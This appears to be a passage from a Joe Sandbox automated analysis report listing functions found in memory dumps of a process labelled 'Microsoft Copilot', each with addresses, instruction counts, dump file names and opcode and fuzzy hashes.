                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 91c04e030efc88401b73c58da765504dce934bf39d9cbb6193693933f724a446
                                                                                      • Instruction ID: 122a0a98a49ae0e2e872d0066dfdebe8e288e8e87de815292419d761abaf9516
                                                                                      • Opcode Fuzzy Hash: 91c04e030efc88401b73c58da765504dce934bf39d9cbb6193693933f724a446
                                                                                      • Instruction Fuzzy Hash: 172192B169861D4FD744EB2DD0969B9BF72FF88220B8545ACE809CB3ABDF346900C744
                                                                                      Function 00007FFAACB22291 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2137178158.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ffaacb20000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1183d140035f282d72cb22a40cff422e947e6c26c2f13b538e9639c951ac577f
                                                                                      • Instruction ID: 6b5317c3be8904284db3e9f71936f1b81e477ab894957d4b630039532a6aac55
                                                                                      • Opcode Fuzzy Hash: 1183d140035f282d72cb22a40cff422e947e6c26c2f13b538e9639c951ac577f
                                                                                      • Instruction Fuzzy Hash: 8701475580E7A14FF745A33898554717FE0CF96221F0840ABE88CCA0A7EC0AA94883C3

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB416E9 Relevance: .7, Instructions: 699COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0efc61fd035b4b3bb5111cf9048fcd6ce823c579f0fb733385d5818c7a104b43
                                                                                      • Instruction ID: 1b87c3353a978df9ce6e766ac926048a48a728b0f60fe5af4cd604dfa0613894
                                                                                      • Opcode Fuzzy Hash: 0efc61fd035b4b3bb5111cf9048fcd6ce823c579f0fb733385d5818c7a104b43
                                                                                      • Instruction Fuzzy Hash: 5322A8A1B5CA598FE794E778C4A9679B7D2FF99300F404579E40EC32E2DE39AC018781
                                                                                      Function 00007FFAACB40E5E Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e457ea438ccdf1f232879f6a870eae651ee938348f7db1ae05b068c6e010500
                                                                                      • Instruction ID: ab38e773238ac3cec3d53a9702539afa796d9022fc843b6ada25f5c943df2fc0
                                                                                      • Opcode Fuzzy Hash: 0e457ea438ccdf1f232879f6a870eae651ee938348f7db1ae05b068c6e010500
                                                                                      • Instruction Fuzzy Hash: 487128A2A0D6960FE352B37CE4599F96B95DF8732470841BBD4CCCB0B3EE0858478395
                                                                                      Function 00007FFAACB420C1 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 801e365cf3057e9b27be35357c05445827e0ebded78e19107890a7b7ffd0a1c5
                                                                                      • Instruction ID: 4ffc7a507fddacb8c7538df1aeb2f7e11ac881fccdccfefdbfe1e15f9d61befc
                                                                                      • Opcode Fuzzy Hash: 801e365cf3057e9b27be35357c05445827e0ebded78e19107890a7b7ffd0a1c5
                                                                                      • Instruction Fuzzy Hash: 53513355A5E6C58FE786A778C8246757FE9DF87215B0804FBE0CDC3293DD08484AC382
                                                                                      Function 00007FFAACB407F2 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;M_$<M_^
                                                                                      • API String ID: 0-3421805066
                                                                                      • Opcode ID: 73054ae3dbe537e7e16551993602aa2e7585cabb0a0d36e926dca0994c040115
                                                                                      • Instruction ID: ebc9480c3ae005e6ccce73e555a12dd4c7253eb51753e854dfb8e34b2f12c390
                                                                                      • Opcode Fuzzy Hash: 73054ae3dbe537e7e16551993602aa2e7585cabb0a0d36e926dca0994c040115
                                                                                      • Instruction Fuzzy Hash: 464106F2A0D1598FD304EB78E4A99EA7BA1EF8531474045BAD45CC73A3EF386845CB84
                                                                                      Function 00007FFAACB411F2 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2M_^
                                                                                      • API String ID: 0-3000290509
                                                                                      • Opcode ID: af707ea9abbae96161be9612dd2ed677873c9fb01d60a237ba60ee3e14662666
                                                                                      • Instruction ID: 69dd7c72b3784656d1f58c69df478f82840f461126bc97670ed3e43e04bcf2e2
                                                                                      • Opcode Fuzzy Hash: af707ea9abbae96161be9612dd2ed677873c9fb01d60a237ba60ee3e14662666
                                                                                      • Instruction Fuzzy Hash: FE51C7A2D0E6598FE701A7BCE8A54F9BF70EF43324B0842B7D48CD61B3DE1558098794
                                                                                      Function 00007FFAACB411F0 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2M_^
                                                                                      • API String ID: 0-3000290509
                                                                                      • Opcode ID: 8f329953aa86d2ad48036c1d165d06120e57e517ac505b661b975d497dc0ea73
                                                                                      • Instruction ID: fc9704bc2070a8fcffe9d7f9b90d94fd70a4869b43dda5c1adbe41359eba85a7
                                                                                      • Opcode Fuzzy Hash: 8f329953aa86d2ad48036c1d165d06120e57e517ac505b661b975d497dc0ea73
                                                                                      • Instruction Fuzzy Hash: EF51D6A2D0E65A4FE701A7BCE8954E9BF70EF43324B0842B7D48CD61B3EE1558098794
                                                                                      Function 00007FFAACB412B8 Relevance: .5, Instructions: 485COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ba6d230b7ec3aaa850cf97e53a4ed10fa7fc45fd8e8a62ecdcce9c388aba04d
                                                                                      • Instruction ID: 414409b9410dc07eac00b62761c58bba93b72ad26c0e2e39a6dd8a0f87c3cb9c
                                                                                      • Opcode Fuzzy Hash: 2ba6d230b7ec3aaa850cf97e53a4ed10fa7fc45fd8e8a62ecdcce9c388aba04d
                                                                                      • Instruction Fuzzy Hash: 7831CD62D0DA5E8FE745E768D8650FDBFB1EF46200F4502BAD409E32A2DE25A8098791
                                                                                      Function 00007FFAACB40AFA Relevance: .2, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df6f83beb7352dd3eb7984c45b8f781a035feeaba14fee96b58d96a807ec6d3c
                                                                                      • Instruction ID: 7828d2abf672b6e915d14c69049d2d780ca216778fcdf94273e7dc3a215d0c73
                                                                                      • Opcode Fuzzy Hash: df6f83beb7352dd3eb7984c45b8f781a035feeaba14fee96b58d96a807ec6d3c
                                                                                      • Instruction Fuzzy Hash: A451C7B2A0D52E8BEB04BBBCE4955EDB3A1EF95325B40427AD40CC72A3DF35A445C784
                                                                                      Function 00007FFAACB40B6F Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 65353487791a1e46de56ba298a06710c7b5ab9b3f318fe8ce34573ec51062e99
                                                                                      • Instruction ID: d14d4bab08916981bf3ad5f203a61c5276b13801b925514dd0734c79fdef6e8c
                                                                                      • Opcode Fuzzy Hash: 65353487791a1e46de56ba298a06710c7b5ab9b3f318fe8ce34573ec51062e99
                                                                                      • Instruction Fuzzy Hash: 7B41E7B2B0952D8FDB44FBB8D8556EDB7A1FF89311F40467AD409C3292DE35A446C780
                                                                                      Function 00007FFAACB40638 Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b03d48f4d04a25651be0ede4bd519f21558ffd17f42f94cd0ae2652d100d977d
                                                                                      • Instruction ID: 10d7e1455adf8c4f8577dd9c1e9f0fd8b9830ce1be2ce0430adabcab20da0032
                                                                                      • Opcode Fuzzy Hash: b03d48f4d04a25651be0ede4bd519f21558ffd17f42f94cd0ae2652d100d977d
                                                                                      • Instruction Fuzzy Hash: 1F31B262B1C9494FE798EB2CD45A779B6C6EFD9315F0405BEE04EC3293DE689C428381
                                                                                      Function 00007FFAACB40D48 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8e4cdd474496f12165905b01adeeca2e4b1654b9edd3b57ae41f205dcaeef19
                                                                                      • Instruction ID: 06c94fbfcc73cb2d181afc0569b924cee9f252a5312969f7680ce7d1f107a529
                                                                                      • Opcode Fuzzy Hash: a8e4cdd474496f12165905b01adeeca2e4b1654b9edd3b57ae41f205dcaeef19
                                                                                      • Instruction Fuzzy Hash: 4F2157A1B1491A4FFB84B7FCD45E7BCB2D6EF98711F1042B6E50DC3296DE2898418381
                                                                                      Function 00007FFAACB4086D Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e601c4e4c4b918c516457c89b28881b56eebd2f04103197f99d29d1b34035752
                                                                                      • Instruction ID: 957e10130afac642c9d99fe539a55b89daf077b796c3822737d93a99e6407b43
                                                                                      • Opcode Fuzzy Hash: e601c4e4c4b918c516457c89b28881b56eebd2f04103197f99d29d1b34035752
                                                                                      • Instruction Fuzzy Hash: 992174B565C5994FD744EB28D0A59ABBF73FF8C200B9144A8E928C33ABDF345900C740
                                                                                      Function 00007FFAACB42291 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2434465047.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffaacb40000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 683b5f3f0e7eeedc8c51d3cb0ae08156f6983efb7c0f31f1d8a5c0ddddcfbde3
                                                                                      • Instruction ID: 0c58ad9322bdd68e024a7d63c8684b0fb5611ebbc94fb01cec3458f189a6a410
                                                                                      • Opcode Fuzzy Hash: 683b5f3f0e7eeedc8c51d3cb0ae08156f6983efb7c0f31f1d8a5c0ddddcfbde3
                                                                                      • Instruction Fuzzy Hash: 4601424880EBA18EF745A338D8555327FE0CF96211B0840ABE88CD71A7D80AAD4893C3